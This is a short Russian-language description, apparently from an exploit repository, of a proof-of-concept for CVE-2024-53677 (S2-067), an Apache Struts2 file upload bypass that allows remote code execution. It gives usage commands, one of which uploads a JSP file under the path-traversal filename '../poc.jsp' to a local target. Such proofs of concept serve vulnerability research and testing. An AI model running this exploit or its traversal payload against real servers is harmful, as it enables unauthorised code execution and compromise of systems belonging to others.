
Эксплойт для подтверждения концепции CVE-2024-53677 (S2-067), обход логики загрузки файлов в Apache Struts2, позволяющий удаленное выполнение кода через манипулирование параметрами имени файла.
python3 s2-067.py -h
python3 s2-067.py -u http://localhost:28080/uploadFile -filename ../poc.jsp -file 2.jsp -type s
